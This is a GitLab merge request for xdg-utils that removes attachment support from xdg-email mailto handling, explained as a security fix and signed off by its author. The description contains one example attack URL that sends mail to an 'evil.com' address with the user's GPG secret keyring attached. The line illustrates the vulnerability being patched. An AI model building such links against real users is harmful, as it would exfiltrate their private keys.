xdg-email: remove attachment handling from mailto (!28) · Merge requests · xdg / xdg-utils · GitLab

Due to an influx of spam, we have had to impose restrictions on new accounts. Please see this wiki page for instructions on how to get full permissions. Sorry for the inconvenience.

Jörg Thalheim requested to merge Mic92/xdg-utils:fix-mailto into master Oct 20, 2020

This allows attacker to extract secrets from users:

mailto:sid@evil.com?attach=/.gnupg/secring.gpg

See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 and #177

Signed-off-by: Jörg Thalheim joerg@thalheim.io